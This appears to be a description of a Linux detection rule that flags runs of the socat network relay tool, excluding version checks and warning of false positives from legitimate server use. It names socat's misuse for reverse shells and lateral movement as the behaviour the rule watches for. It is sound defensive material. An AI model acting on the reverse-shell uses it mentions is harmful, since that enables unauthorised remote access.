This detection rule focuses on identifying the execution of the 'socat' process on Linux hosts. Socat, a command-line based utility, facilitates the establishment of two bidirectional byte streams, which can be employed both for legitimate purposes as well as malicious activities. Common malicious use cases involve setting up reverse shells or listening ports that could imply unauthorized access or lateral movement across network segments. Given its dual-use nature, discerning between benign and malicious instances of Socat's utilization can be challenging, particularly as scripts and automated tools can invoke its functionality routinely. The rule aims to capture processes classified under "start" or "process_started" events where the 'socat' process is running, while excluding commands that invoke Socat in a benign manner (those with '-V' argument). It is crucial to note the potential for false positives due to the legitimate use of Socat in server setups and scripts, particularly if used by web servers, which might warrant further contextual investigation to ascertain the intent behind its execution.